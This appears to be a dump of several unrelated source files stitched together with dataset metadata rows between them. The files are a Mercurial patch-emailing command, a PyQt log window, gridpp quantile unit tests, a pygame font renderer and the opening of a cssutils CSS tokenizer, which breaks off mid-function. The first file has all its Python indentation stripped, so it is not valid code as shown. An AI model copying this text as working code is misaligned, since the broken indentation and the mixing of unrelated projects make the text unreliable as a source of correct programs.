def patchbomb(ui, repo, *revs, **opts):
'''send changesets by email
By default, diffs are sent in the format generated by
:hg:`export`, one per message. The series starts with a "[PATCH 0
of N]" introduction, which describes the series as a whole.
Each patch email has a Subject line of "[PATCH M of N] ...", using
the first line of the changeset description as the subject text.
The message contains two or three parts. First, the changeset
description.
With the -d/--diffstat option, if the diffstat program is
installed, the result of running diffstat on the patch is inserted.
Finally, the patch itself, as generated by :hg:`export`.
With the -d/--diffstat or --confirm options, you will be presented
with a final summary of all messages and asked for confirmation before
the messages are sent.
By default the patch is included as text in the email body for
easy reviewing. Using the -a/--attach option will instead create
an attachment for the patch. With -i/--inline an inline attachment
will be created. You can include a patch both as text in the email
body and as a regular or an inline attachment by combining the
-a/--attach or -i/--inline with the --body option.
With -o/--outgoing, emails will be generated for patches not found
in the destination repository (or only those which are ancestors
of the specified revisions if any are provided)
With -b/--bundle, changesets are selected as for --outgoing, but a
single email containing a binary Mercurial bundle as an attachment
will be sent.
With -m/--mbox, instead of previewing each patchbomb message in a
pager or sending the messages directly, it will create a UNIX
mailbox file with the patch emails. This mailbox file can be
previewed with any mail user agent which supports UNIX mbox
files.
With -n/--test, all steps will run, but mail will not be sent.
You will be prompted for an email recipient address, a subject and
an introductory message describing the patches of your patchbomb.
Then when all is done, patchbomb messages are displayed. If the
PAGER environment variable is set, your pager will be fired up once
for each patchbomb message, so you can verify everything is alright.
In case email sending fails, you will find a backup of your series
introductory message in ``.hg/last-email.txt``.
Examples::
hg email -r 3000 # send patch 3000 only
hg email -r 3000 -r 3001 # send patches 3000 and 3001
hg email -r 3000:3005 # send patches 3000 through 3005
hg email 3000 # send patch 3000 (deprecated)
hg email -o # send all patches not in default
hg email -o DEST # send all patches not in DEST
hg email -o -r 3000 # send all ancestors of 3000 not in default
hg email -o -r 3000 DEST # send all ancestors of 3000 not in DEST
hg email -b # send bundle of all patches not in default
hg email -b DEST # send bundle of all patches not in DEST
hg email -b -r 3000 # bundle of all ancestors of 3000 not in default
hg email -b -r 3000 DEST # bundle of all ancestors of 3000 not in DEST
hg email -o -m mbox && # generate an mbox file...
mutt -R -f mbox # ... and view it with mutt
hg email -o -m mbox && # generate an mbox file ...
formail -s sendmail \\ # ... and use formail to send from the mbox
-bm -t < mbox # ... using sendmail
Before using this command, you will need to enable email in your
hgrc. See the [email] section in hgrc(5) for details.
'''
_charsets = mail._charsets(ui)
bundle = opts.get('bundle')
date = opts.get('date')
mbox = opts.get('mbox')
outgoing = opts.get('outgoing')
rev = opts.get('rev')
# internal option used by pbranches
patches = opts.get('patches')
def getoutgoing(dest, revs):
'''Return the revisions present locally but not in dest'''
url = ui.expandpath(dest or 'default-push', dest or 'default')
url = hg.parseurl(url)[0]
ui.status(_('comparing with %s\n') % util.hidepassword(url))
revs = [r for r in scmutil.revrange(repo, revs) if r >= 0]
if not revs:
revs = [len(repo) - 1]
revs = repo.revs('outgoing(%s) and ::%ld', dest or '', revs)
if not revs:
ui.status(_("no changes found\n"))
return []
return [str(r) for r in revs]
def getpatches(revs):
for r in scmutil.revrange(repo, revs):
output = cStringIO.StringIO()
cmdutil.export(repo, [r], fp=output,
opts=patch.diffopts(ui, opts))
yield output.getvalue().split('\n')
def getbundle(dest):
tmpdir = tempfile.mkdtemp(prefix='hg-email-bundle-')
tmpfn = os.path.join(tmpdir, 'bundle')
try:
commands.bundle(ui, repo, tmpfn, dest, **opts)
fp = open(tmpfn, 'rb')
data = fp.read()
fp.close()
return data
finally:
try:
os.unlink(tmpfn)
except OSError:
pass
os.rmdir(tmpdir)
if not (opts.get('test') or mbox):
# really sending
mail.validateconfig(ui)
if not (revs or rev or outgoing or bundle or patches):
raise util.Abort(_('specify at least one changeset with -r or -o'))
if outgoing and bundle:
raise util.Abort(_("--outgoing mode always on with --bundle;"
" do not re-specify --outgoing"))
if outgoing or bundle:
if len(revs) > 1:
raise util.Abort(_("too many destinations"))
dest = revs and revs[0] or None
revs = []
if rev:
if revs:
raise util.Abort(_('use only one form to specify the revision'))
revs = rev
if outgoing:
revs = getoutgoing(dest, rev)
if bundle:
opts['revs'] = revs
# start
if date:
start_time = util.parsedate(date)
else:
start_time = util.makedate()
def genmsgid(id):
return '<%s.%s@%s>' % (id[:20], int(start_time[0]), socket.getfqdn())
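        # e.g. '<1a2b3c4d5e6f708192a3.1500000000@example.org>' (hypothetical node prefix,
        # send time and local fqdn)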
def getdescription(body, sender):
if opts.get('desc'):
body = open(opts.get('desc')).read()
else:
ui.write(_('\nWrite the introductory message for the '
'patch series.\n\n'))
body = ui.edit(body, sender)
# Save series description in case sendmail fails
msgfile = repo.opener('last-email.txt', 'wb')
msgfile.write(body)
msgfile.close()
return body
def getpatchmsgs(patches, patchnames=None):
msgs = []
ui.write(_('this patch series consists of %d patches.\n\n')
% len(patches))
# build the intro message, or skip it if the user declines
if introwanted(opts, len(patches)):
msg = makeintro(patches)
if msg:
msgs.append(msg)
# are we going to send more than one message?
numbered = len(msgs) + len(patches) > 1
# now generate the actual patch messages
name = None
for i, p in enumerate(patches):
if patchnames:
name = patchnames[i]
msg = makepatch(ui, repo, p, opts, _charsets, i + 1,
len(patches), numbered, name)
msgs.append(msg)
return msgs
def makeintro(patches):
tlen = len(str(len(patches)))
flag = opts.get('flag') or ''
if flag:
flag = ' ' + ' '.join(flag)
prefix = '[PATCH %0*d of %d%s]' % (tlen, 0, len(patches), flag)
subj = (opts.get('subject') or
prompt(ui, '(optional) Subject: ', rest=prefix, default=''))
if not subj:
return None # skip intro if the user doesn't bother
subj = prefix + ' ' + subj
body = ''
if opts.get('diffstat'):
# generate a cumulative diffstat of the whole patch series
diffstat = patch.diffstat(sum(patches, []))
body = '\n' + diffstat
else:
diffstat = None
body = getdescription(body, sender)
msg = mail.mimeencode(ui, body, _charsets, opts.get('test'))
msg['Subject'] = mail.headencode(ui, subj, _charsets,
opts.get('test'))
return (msg, subj, diffstat)
def getbundlemsgs(bundle):
subj = (opts.get('subject')
or prompt(ui, 'Subject:', 'A bundle for your repository'))
body = getdescription('', sender)
msg = email.MIMEMultipart.MIMEMultipart()
if body:
msg.attach(mail.mimeencode(ui, body, _charsets, opts.get('test')))
datapart = email.MIMEBase.MIMEBase('application', 'x-mercurial-bundle')
datapart.set_payload(bundle)
bundlename = '%s.hg' % opts.get('bundlename', 'bundle')
datapart.add_header('Content-Disposition', 'attachment',
filename=bundlename)
email.Encoders.encode_base64(datapart)
msg.attach(datapart)
msg['Subject'] = mail.headencode(ui, subj, _charsets, opts.get('test'))
return [(msg, subj, None)]
sender = (opts.get('from') or ui.config('email', 'from') or
ui.config('patchbomb', 'from') or
prompt(ui, 'From', ui.username()))
if patches:
msgs = getpatchmsgs(patches, opts.get('patchnames'))
elif bundle:
msgs = getbundlemsgs(getbundle(dest))
else:
msgs = getpatchmsgs(list(getpatches(revs)))
showaddrs = []
def getaddrs(header, ask=False, default=None):
configkey = header.lower()
opt = header.replace('-', '_').lower()
addrs = opts.get(opt)
if addrs:
showaddrs.append('%s: %s' % (header, ', '.join(addrs)))
return mail.addrlistencode(ui, addrs, _charsets, opts.get('test'))
# not on the command line: fallback to config and then maybe ask
addr = (ui.config('email', configkey) or
ui.config('patchbomb', configkey) or
'')
if not addr and ask:
addr = prompt(ui, header, default=default)
if addr:
showaddrs.append('%s: %s' % (header, addr))
return mail.addrlistencode(ui, [addr], _charsets, opts.get('test'))
else:
return default
to = getaddrs('To', ask=True)
if not to:
# we can get here in non-interactive mode
raise util.Abort(_('no recipient addresses provided'))
cc = getaddrs('Cc', ask=True, default='') or []
bcc = getaddrs('Bcc') or []
replyto = getaddrs('Reply-To')
if opts.get('diffstat') or opts.get('confirm'):
ui.write(_('\nFinal summary:\n\n'))
ui.write(('From: %s\n' % sender))
for addr in showaddrs:
ui.write('%s\n' % addr)
for m, subj, ds in msgs:
ui.write(('Subject: %s\n' % subj))
if ds:
ui.write(ds)
ui.write('\n')
if ui.promptchoice(_('are you sure you want to send (yn)?'
'$$ &Yes $$ &No')):
raise util.Abort(_('patchbomb canceled'))
ui.write('\n')
parent = opts.get('in_reply_to') or None
# angle brackets may be omitted, they're not semantically part of the msg-id
if parent is not None:
if not parent.startswith('<'):
parent = '<' + parent
if not parent.endswith('>'):
parent += '>'
sender_addr = email.Utils.parseaddr(sender)[1]
sender = mail.addressencode(ui, sender, _charsets, opts.get('test'))
sendmail = None
for i, (m, subj, ds) in enumerate(msgs):
try:
m['Message-Id'] = genmsgid(m['X-Mercurial-Node'])
except TypeError:
m['Message-Id'] = genmsgid('patchbomb')
if parent:
m['In-Reply-To'] = parent
m['References'] = parent
if not parent or 'X-Mercurial-Node' not in m:
parent = m['Message-Id']
m['User-Agent'] = 'Mercurial-patchbomb/%s' % util.version()
m['Date'] = email.Utils.formatdate(start_time[0], localtime=True)
start_time = (start_time[0] + 1, start_time[1])
m['From'] = sender
m['To'] = ', '.join(to)
if cc:
m['Cc'] = ', '.join(cc)
if bcc:
m['Bcc'] = ', '.join(bcc)
if replyto:
m['Reply-To'] = ', '.join(replyto)
if opts.get('test'):
ui.status(_('displaying '), subj, ' ...\n')
ui.flush()
if 'PAGER' in os.environ and not ui.plain():
fp = util.popen(os.environ['PAGER'], 'w')
else:
fp = ui
generator = email.Generator.Generator(fp, mangle_from_=False)
try:
generator.flatten(m, 0)
fp.write('\n')
except IOError, inst:
if inst.errno != errno.EPIPE:
raise
if fp is not ui:
fp.close()
else:
if not sendmail:
verifycert = ui.config('smtp', 'verifycert')
if opts.get('insecure'):
ui.setconfig('smtp', 'verifycert', 'loose')
try:
sendmail = mail.connect(ui, mbox=mbox)
finally:
ui.setconfig('smtp', 'verifycert', verifycert)
ui.status(_('sending '), subj, ' ...\n')
ui.progress(_('sending'), i, item=subj, total=len(msgs))
if not mbox:
# Exim does not remove the Bcc field
del m['Bcc']
fp = cStringIO.StringIO()
generator = email.Generator.Generator(fp, mangle_from_=False)
generator.flatten(m, 0)
sendmail(sender_addr, to + bcc + cc, fp.getvalue())
ui.progress(_('writing'), None)
ui.progress(_('sending'), None)
| gpl-2.0 | -2,522,663,191,073,142,300 | 37.15508 | 80 | 0.575286 | false |
geosohh/AnimeTorr | animetorr/manager/log.py | 1 | 7132 | # -*- coding: utf-8 -*-
"""
Log window.
"""
__author__ = 'Sohhla'
import os
from PyQt4 import QtGui, QtCore
from qt.log import Ui_Dialog as Ui_Log
from shared import constant
# TODO: Works, but waaaaaay too slow to load
class LogUpdater(QtCore.QObject):
"""
Updates the [Log window].
"""
finish = QtCore.pyqtSignal()
update_ui = QtCore.pyqtSignal(str)
def __init__(self, parent=None):
super(LogUpdater, self).__init__(parent)
self.log_paused = False
self.previous_log_file_size = 0
self.timer = None
self.log_lines_read = -1
self.html_log = ""
def start_timer(self):
"""
Starts timer. When it times out, will update the window again.
"""
self.timer = QtCore.QTimer()
# noinspection PyUnresolvedReferences
self.timer.timeout.connect(self.update_log) # PyCharm doesn't recognize timeout.connect()...
self.timer.setSingleShot(True)
self.timer.start(1000)
def update_log(self):
"""
Reads the log file and updates the window.
"""
if not self.log_paused:
try:
log_size = os.path.getsize(constant.LOG_PATH)
except os.error:
log_size = -1
if self.previous_log_file_size!=log_size and log_size!=-1:
if self.previous_log_file_size > log_size:
self.log_lines_read = -1
if self.log_lines_read == -1:
self.html_log = "<table style=\"font-family:'MS Shell Dlg 2',monospace; font-size:14\">"
# reading log, converting into html
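                # each line is expected to look like "asctime ## name ## levelname ## message"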
line_i = 0
for log_line in open(constant.LOG_PATH,'r'):
if line_i >= self.log_lines_read:
temp = log_line.split(" ## ")
asctime = temp[0].strip()
name = temp[1].strip()
levelname = temp[2].strip()
message = temp[3].strip()
color = "0000FF"
if levelname=="DEBUG":
color = "008000"
elif levelname=="INFO":
color = "000000"
elif levelname=="WARNING":
color = "B8860B"
elif levelname=="ERROR":
color = "FF0000"
elif levelname=="CRITICAL":
color = "8A2BE2"
temp = "<tr style=\"color:#"+color+";\">\
<td style=\"padding-right: 5px;\">"+asctime+"</td>\
<td style=\"padding-right: 10px;padding-left: 10px;\" align=\"center\">#</td>\
<td style=\"padding-right: 5px; padding-left: 5px; \" align=\"center\">"+name+"</td>\
<td style=\"padding-right: 10px;padding-left: 10px;\" align=\"center\">#</td>\
<td style=\"padding-right: 5px; padding-left: 5px; \" align=\"center\">"+levelname+"</td>\
<td style=\"padding-right: 10px;padding-left: 10px;\" align=\"center\">#</td>\
<td style=\"padding-left: 5px;\">"+message+"</td></tr>"
self.html_log += temp
line_i+=1
self.log_lines_read = line_i
if self.log_paused:
self.finish.emit() # log paused, exiting thread
else:
# sending update to GUI
self.update_ui.emit(self.html_log+"</table>")
self.previous_log_file_size = log_size
self.start_timer()
else:
self.finish.emit()
def stop_thread(self):
"""
Stops log update.
"""
if self.timer is not None:
self.timer.stop()
self.finish.emit()
class WindowLog():
"""
Creates Log window.
"""
def __init__(self, parent_window):
self.dialog_log = WindowLogDialog(self, parent_window, QtCore.Qt.WindowSystemMenuHint |
QtCore.Qt.WindowMaximizeButtonHint |
QtCore.Qt.WindowTitleHint |
QtCore.Qt.Window)
self.ui_log = Ui_Log()
self.ui_log.setupUi(self.dialog_log)
self.ui_log.button_pause.clicked.connect(self.pause_log)
self.ui_log.text_log.setHtml("Loading...")
self.log_paused = False
self.thread = None
self.log_updater = None
self.create_thread()
def show(self):
"""
Shows Log window.
"""
self.dialog_log.exec_()
def create_thread(self):
"""
Creates thread to update log.
"""
self.thread = QtCore.QThread(self.dialog_log)
self.log_updater = LogUpdater()
self.log_updater.moveToThread(self.thread)
self.log_updater.update_ui.connect(self.update_log_ui)
self.log_updater.finish.connect(self.thread.quit)
# noinspection PyUnresolvedReferences
self.thread.started.connect(self.log_updater.update_log) # PyCharm doesn't recognize started.connect()...
self.thread.start()
self.dialog_log.stop_thread.connect(self.log_updater.stop_thread)
def update_log_ui(self,new_html):
"""
Update window with new html.
:type new_html: str
:param new_html: ...
"""
self.ui_log.text_log.setHtml(new_html)
temp_cursor = self.ui_log.text_log.textCursor()
temp_cursor.movePosition(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor)
self.ui_log.text_log.setTextCursor(temp_cursor)
self.dialog_log.repaint()
# noinspection PyArgumentList
QtCore.QCoreApplication.processEvents(QtCore.QEventLoop.AllEvents)
def pause_log(self):
"""
Stops window from being updated until the user clicks the button again.
"""
if self.log_paused:
self.log_paused = False
self.ui_log.button_pause.setText("Pause Log")
self.create_thread()
else:
self.log_paused = True
self.ui_log.button_pause.setText("Resume Log")
self.dialog_log.stop_thread.emit()
class WindowLogDialog(QtGui.QDialog):
"""
Overrides default QDialog class to be able to control the close window event.
"""
stop_thread = QtCore.pyqtSignal()
def __init__(self, window, parent=None, params=None):
super(WindowLogDialog, self).__init__(parent,params)
self.window = window
def closeEvent(self, _):
"""
When closing the window, stop the thread.
:type _: QCloseEvent
:param _: Describes the close event. Not used.
"""
if self.window.log_updater is not None:
self.stop_thread.emit() | gpl-2.0 | -3,731,463,448,882,287,600 | 35.768041 | 122 | 0.514582 | false |
metno/gridpp | tests/neighbourhood_quantile_fast_test.py | 1 | 5647 | from __future__ import print_function
import unittest
import gridpp
import numpy as np
lats = [60, 60, 60, 60, 60, 70]
lons = [10,10.1,10.2,10.3,10.4, 10]
"""Simple check
20 21 22 23 24
15 16 17 18 19
10 11 12 13 nan
5 6 7 nan 9
0 1 2 3 4
"""
values = np.reshape(range(25), [5, 5]).astype(float)
values[1, 3] = np.nan
values[2, 4] = np.nan
values = np.array(values)
class Test(unittest.TestCase):
def test_invalid_arguments(self):
"""Check that exception is thrown for invalid arguments"""
field = np.ones([5, 5])
halfwidth = -1
quantiles = [-0.1, 1.1, np.nan]
thresholds = [0, 1]
for quantile in quantiles:
with self.assertRaises(ValueError) as e:
gridpp.neighbourhood_quantile_fast(field, quantile, halfwidth, thresholds)
def test_nan_quantile(self):
field = np.ones([5, 5])
halfwidth = 1
quantile = np.nan
thresholds = [0, 1]
output = gridpp.neighbourhood_quantile_fast(field, quantile, halfwidth, thresholds)
np.testing.assert_array_almost_equal(np.nan*np.ones(output.shape), output)
def test_empty(self):
for quantile in np.arange(0.1,0.9,0.1):
for num_thresholds in [1, 2]:
thresholds = gridpp.get_neighbourhood_thresholds(values, num_thresholds)
output = gridpp.neighbourhood_quantile_fast([[]], 0.9, 1, thresholds)
self.assertEqual(len(output.shape), 2)
self.assertEqual(output.shape[0], 0)
self.assertEqual(output.shape[1], 0)
def test_single_threshold(self):
"""Checks what happens when a single threshold is provided"""
thresholds = [0]
field = np.reshape(np.arange(9), [3, 3])
for halfwidth in [0, 1, 2]:
output = gridpp.neighbourhood_quantile_fast(field, 0.9, halfwidth, thresholds)
np.testing.assert_array_equal(output, np.zeros([3, 3]))
def test_two_thresholds(self):
"""Checks what happens when a single threshold is provided"""
thresholds = [0, 1]
field = np.reshape(np.arange(9), [3, 3])
for halfwidth in [0, 1, 2]:
output = gridpp.neighbourhood_quantile_fast(field, 0.9, 0, thresholds)
self.assertTrue(((output >= 0) & (output <= 1)).all())
def test_missing(self):
empty = np.zeros([5, 5])
empty[0:3, 0:3] = np.nan
thresholds = [0, 1]
output = gridpp.neighbourhood_quantile_fast(empty, 0.5, 1, thresholds)
self.assertTrue(np.isnan(np.array(output)[0:2,0:2]).all())
def test_quantile(self):
thresholds = gridpp.get_neighbourhood_thresholds(values, 100)
output = np.array(gridpp.neighbourhood_quantile_fast(values, 0.5, 1, thresholds))
self.assertEqual(output[2][2], 12) # Should be 12.5
self.assertEqual(output[2][3], 12.5) # Should be 13
output = np.array(gridpp.neighbourhood_quantile_fast(np.full([100,100], np.nan), 0.5, 1, thresholds))
self.assertTrue(np.isnan(np.array(output)).all())
output = np.array(gridpp.neighbourhood_quantile_fast(np.zeros([100,100]), 0.5, 1, thresholds))
self.assertTrue((np.array(output) == 0).all())
output = np.array(gridpp.neighbourhood_quantile(values, 0.5, 1))
self.assertEqual(output[2][2], 12.5)
self.assertEqual(output[2][3], 13)
self.assertEqual(output[0][4], 4)
def test_3d(self):
np.random.seed(1000)
values = np.random.rand(200, 200)
values3 = np.zeros([200, 200, 5])
for i in range(5):
values3[:, :, i] = values
halfwidths = [0, 1, 5]
quantile = 0.5
thresholds = [0, 0.25, 0.5, 0.75, 1]
for halfwidth in halfwidths:
output_2d = gridpp.neighbourhood_quantile_fast(values, quantile, halfwidth, thresholds)
output_3d = gridpp.neighbourhood_quantile_fast(values3, quantile, halfwidth, thresholds)
np.testing.assert_array_almost_equal(output_2d, output_3d)
def test_varying_quantile(self):
""" For now check that this runs """
values = np.array([[0, 1], [2, 3], [4, 5]])
halfwidth = 1
quantiles = np.ones(values.shape) * 0.5
thresholds = [0, 0.25, 0.5, 0.75, 1]
gridpp.neighbourhood_quantile_fast(values, quantiles, halfwidth, thresholds)
values = np.nan *np.zeros(values.shape)
np.testing.assert_array_equal(values, gridpp.neighbourhood_quantile_fast(values, quantiles, halfwidth, thresholds))
def test_varying_quantile_3d(self):
""" For now check that this runs """
np.random.seed(1000)
values = np.random.rand(100, 50, 2)
halfwidth = 1
quantiles = np.ones(values[:, :, 0].shape) * 0.5
thresholds = [0, 0.25, 0.5, 0.75, 1]
gridpp.neighbourhood_quantile_fast(values, quantiles, halfwidth, thresholds)
values = np.nan *np.zeros(values.shape)
np.testing.assert_array_equal(values[:, :, 0], gridpp.neighbourhood_quantile_fast(values, quantiles, halfwidth, thresholds))
def test_all_same(self):
""" Check that min and max of an neighbourhood with all identical values is correct """
field = np.zeros([10, 10])
thresholds = [0, 0.1, 0.2, 0.5, 1, 2, 5, 10, 20, 50, 100]
for quantile in [0, 0.001, 0.999, 1]:
with self.subTest(quantile=quantile):
output = gridpp.neighbourhood_quantile_fast(field, quantile, 5, thresholds)
np.testing.assert_array_almost_equal(output, field)
if __name__ == '__main__':
unittest.main()
| gpl-2.0 | 6,977,101,496,407,008,000 | 39.335714 | 132 | 0.606517 | false |
Fenixin/yogom | tryengine/fontrenderer.py | 1 | 8186 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# This file is part of TryEngine.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
'''
Created on 20/03/2014
@author: Alejandro Aguilera Martínez
@email: [email protected]
Module to render fonts with different effects.
See FontRenderer for help.
'''
from itertools import product
from math import ceil
import pygame as pg
from pygame.font import Font
from pygame import Surface
from pygame.transform import laplacian
#TODO: Transparent things aren't handled properly!
# Choosing the same color as the transparent color
# used internally will do very ugly stuff
class FontRenderer(object):
'''
Object to render text of any size.
    Rendering text is done through layers. Layers are passed to
    render as a list. You can render as many layers as you want.
    Here is an example with all the layer types:
layers = [
('external_border',{'width':2, 'color':VIOLET}),
('shadows',{'positions_and_colors':[((2,-2),GREEN),((1,-1),RED)]}),
('normal',{'color':WHITE}),#
('internal_border', {'color':(GREEN)}),
('textured',{'image':image_texture})
]
'''
TRANSPARENT = (255, 0, 255)
def __init__(self, font_file, antialias=False):
'''
Constructor
'''
if font_file:
self.font_file = font_file
else:
self.font_file = pg.font.get_default_font()
self._font_sizes = {}
self.antialias = antialias
# Parameters to create images
self.DISPLAY_BITDEPTH = pg.display.get_surface().get_bitsize()
self.IMG_FLAGS = pg.HWSURFACE
def _add_fontsize(self, filename, size):
""" Add a font size renderer to _font_sizes. """
self._font_sizes[size] = Font(filename, size)
def __getitem__(self, size):
""" Return the proper font size. """
try:
return self._font_sizes[size]
except KeyError:
self._add_fontsize(self.font_file, size)
return self._font_sizes[size]
def _get_new_surface(self, text, pixel_size):
""" Return a surface with the needed size for the text."""
img = Surface(pixel_size, self.IMG_FLAGS)
img.fill(self.TRANSPARENT)
img.set_colorkey(self.TRANSPARENT)
return img
def size(self, text, size, layers = []):
""" Return the image size in pixels.
        This takes into account all the layers given
        and calculates the correct image size.
"""
x, y = self[size].size(text)
for layer in layers:
if layer[0] == 'shadows':
mx = my = 0
for t in layer[1]['positions_and_colors']:
mx = max(abs(t[0][0]), mx)
my = max(abs(t[0][1]), my)
x += mx*2
y += my*2
elif layer[0] == 'external_border':
width = layer[1]['width']
x += width*2
y += width*2
return (x,y)
def _render_internal(self, text, size, color, bg_color):
"""
Wrapper
"""
# For fastest blitting set hwsurface and the same
# bit depth as the display surface.
# Also for your
# own sanity, remember that rendering fonts will give
# you a 8bit image and, sometimes, this will give
# unexpected results
# when blittings in a 32bits surface
img = self[size].render(text, self.antialias, color, bg_color)
return img.convert(self.DISPLAY_BITDEPTH, self.IMG_FLAGS)
def render(self, text, size, bg_color, bg_transparent, layers):
""" Render text through the defined layers. """
pixel_size = self.size(text, size, layers)
wo_effects_ps = self[size].size(text)
offset = ((pixel_size[0] - wo_effects_ps[0]) / 2,
(pixel_size[1] - wo_effects_ps[1]) / 2)
result = self._get_new_surface(text, pixel_size)
result.fill(bg_color)
if bg_transparent:
result.set_colorkey(bg_color)
# Create all the images and blit them together
images = [getattr(self, '_' + fun)(text, size, pixel_size, offset, **args) for fun, args in layers]
[result.blit(image, (0,0)) for image in images]
return result
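    # Hypothetical usage (assumes a pygame display already exists, since __init__
    # reads the display surface's bit depth):
    #   renderer = FontRenderer(None)   # falls back to pygame's default font
    #   img = renderer.render("Hello", 24, (0, 0, 0), True,
    #                         [('normal', {'color': (255, 255, 255)})])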
def _fill_image(self, dest, filler, blendmode = 0):
""" Fills dest surface with filler repeating if necesary. """
ds = dest.get_size()
fs = filler.get_size()
for x in xrange(int(ceil(ds[0]/float(fs[0])))):
for y in xrange(int(ceil(ds[1]/float(fs[1])))):
dest.blit(filler, (x*fs[0],y*fs[1]), None, blendmode)
"""
Layers
"""
def _textured(self, text, size, pixel_size, offset, image = None):
""" Render a textured font.
Transparent colors in the texture will be ignored.
"""
BG = (0,0,0)
FG = (255,255,255)
blendmode = pg.BLEND_MULT
temp = self._get_new_surface(text, pixel_size)
temp.fill(BG)
temp.blit(self._render_internal(text, size, FG, BG), offset)
self._fill_image(temp, image, blendmode)
return temp
def _normal(self, text, size, pixel_size, offset, color = None):
""" Return a normal render of the text. """
s = self._get_new_surface(text, pixel_size)
img = self._render_internal(text, size, color, self.TRANSPARENT)
img.set_colorkey(self.TRANSPARENT)
s.blit(img, offset)
return s
def _shadows(self, text, size, pixel_size, offset, positions_and_colors):
""" Add 'shadows' with different colors. """
wo_effects_ps = self[size].size(text)
offset = ((pixel_size[0] - wo_effects_ps[0]) / 2,
(pixel_size[1] - wo_effects_ps[1]) / 2)
f = self._render_internal
s = self._get_new_surface(text, pixel_size)
transparent = self.TRANSPARENT
for pos,color in positions_and_colors:
shadow = f(text, size, color, transparent)
shadow.set_colorkey(transparent)
n_pos = (pos[0]+offset[0], pos[1]+offset[1])
s.blit(shadow, n_pos)
return s
def _external_border(self, text, size, pixel_size, offset, width = None, color = None):
""" Add an external border (outside of the font). """
wo_effects_ps = self[size].size(text)
offset = ((pixel_size[0] - wo_effects_ps[0]) / 2,
(pixel_size[1] - wo_effects_ps[1]) / 2)
l = []
for x, y in product(xrange(-width, width+1, 1),xrange(-width, width+1, 1)):
l.append( ((x,y),color) )
return self._shadows(text, size, pixel_size, offset, l)
def _internal_border(self, text, size, pixel_size, offset, color = None):
""" Add an internal border (inside of the font). """
# Use very different colors to get a very sharp edge
BG = (0,0,0)
FG = (255,255,255)
temp = self._get_new_surface(text, pixel_size)
temp.fill(BG)
temp.blit(self._render_internal(text, size, FG, BG), offset)
temp = laplacian(temp)
temp.set_colorkey(FG)
result = self._get_new_surface(text, pixel_size)
result.fill(color)
result.blit(temp, (0,0))
result.set_colorkey(BG)
return result
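# Usage sketch added for illustration; it is not part of the original module.
# FontRenderer reads the display bit depth in its constructor, so a pygame
# display must exist first. The colors, font size and text below are arbitrary
# example values, not values taken from the original code.
if __name__ == '__main__':
    pg.init()
    screen = pg.display.set_mode((320, 120))
    renderer = FontRenderer(None)  # None falls back to pygame's default font
    layers = [
        ('external_border', {'width': 2, 'color': (80, 0, 160)}),
        ('shadows', {'positions_and_colors': [((2, -2), (0, 160, 0))]}),
        ('normal', {'color': (255, 255, 255)}),
    ]
    label = renderer.render("Hello", 32, bg_color=(0, 0, 0),
                            bg_transparent=True, layers=layers)
    screen.blit(label, (10, 10))
    pg.display.flip()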
| gpl-3.0 | -3,237,735,693,081,282,000 | 32.137652 | 107 | 0.5719 | false |
kgn/cssutils | src/cssutils/tokenize2.py | 1 | 9735 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""New CSS Tokenizer (a generator)
"""
__all__ = ['Tokenizer', 'CSSProductions']
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
from cssproductions import *
from helper import normalize
import itertools
import re
_TOKENIZER_CACHE = {}
class Tokenizer(object):
"""
generates a list of Token tuples:
(Tokenname, value, startline, startcolumn)
"""
_atkeywords = {
u'@font-face': CSSProductions.FONT_FACE_SYM,
u'@import': CSSProductions.IMPORT_SYM,
u'@media': CSSProductions.MEDIA_SYM,
u'@namespace': CSSProductions.NAMESPACE_SYM,
u'@page': CSSProductions.PAGE_SYM,
u'@variables': CSSProductions.VARIABLES_SYM
}
_linesep = u'\n'
unicodesub = re.compile(r'\\[0-9a-fA-F]{1,6}(?:\r\n|[\t|\r|\n|\f|\x20])?').sub
cleanstring = re.compile(r'\\((\r\n)|[\n|\r|\f])').sub
def __init__(self, macros=None, productions=None, doComments=True):
"""
inits tokenizer with given macros and productions which default to
cssutils own macros and productions
"""
if type(macros)==type({}):
macros_hash_key = sorted(macros.items())
else:
macros_hash_key = macros
hash_key = str((macros_hash_key, productions))
if hash_key in _TOKENIZER_CACHE:
(tokenmatches, commentmatcher, urimatcher) = _TOKENIZER_CACHE[hash_key]
else:
if not macros:
macros = MACROS
if not productions:
productions = PRODUCTIONS
tokenmatches = self._compile_productions(self._expand_macros(macros,
productions))
commentmatcher = [x[1] for x in tokenmatches if x[0] == 'COMMENT'][0]
urimatcher = [x[1] for x in tokenmatches if x[0] == 'URI'][0]
_TOKENIZER_CACHE[hash_key] = (tokenmatches, commentmatcher, urimatcher)
self.tokenmatches = tokenmatches
self.commentmatcher = commentmatcher
self.urimatcher = urimatcher
self._doComments = doComments
self._pushed = []
def _expand_macros(self, macros, productions):
"""returns macro expanded productions, order of productions is kept"""
def macro_value(m):
return '(?:%s)' % macros[m.groupdict()['macro']]
expanded = []
for key, value in productions:
while re.search(r'{[a-zA-Z][a-zA-Z0-9-]*}', value):
value = re.sub(r'{(?P<macro>[a-zA-Z][a-zA-Z0-9-]*)}',
macro_value, value)
expanded.append((key, value))
return expanded
def _compile_productions(self, expanded_productions):
"""compile productions into callable match objects, order is kept"""
compiled = []
for key, value in expanded_productions:
compiled.append((key, re.compile('^(?:%s)' % value, re.U).match))
return compiled
def push(self, *tokens):
"""Push back tokens which have been pulled but not processed."""
self._pushed = itertools.chain(tokens, self._pushed)
def clear(self):
self._pushed = []
def tokenize(self, text, fullsheet=False):
"""Generator: Tokenize text and yield tokens, each token is a tuple
of::
(name, value, line, col)
The token value will contain a normal string, meaning CSS unicode
escapes have been resolved to normal characters. The serializer
escapes needed characters back to unicode escapes depending on
the stylesheet target encoding.
text
to be tokenized
fullsheet
if ``True`` appends EOF token as last one and completes incomplete
COMMENT or INVALID (to STRING) tokens
"""
def _repl(m):
"used by unicodesub"
num = int(m.group(0)[1:], 16)
if num < 0x10000:
return unichr(num)
else:
return m.group(0)
def _normalize(value):
